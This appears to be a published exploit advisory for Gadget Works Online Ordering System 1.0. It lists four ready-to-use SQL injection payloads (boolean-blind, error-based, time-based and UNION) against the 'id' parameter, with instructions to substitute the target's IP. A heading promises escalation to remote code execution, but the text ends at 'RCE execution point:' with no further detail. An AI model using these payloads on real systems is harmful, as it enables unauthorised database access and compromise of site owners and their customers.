Authored by Richard Jones

Gadget Works Online Ordering System version 1.0 remote SQL injection to remote code execution exploit.

# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi
# Date: 03/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage:
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

SQL Injection details:

*replace IP with the website IP


Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -

SQL Injection to RCE

*replace IP with websites IP


RCE execution point: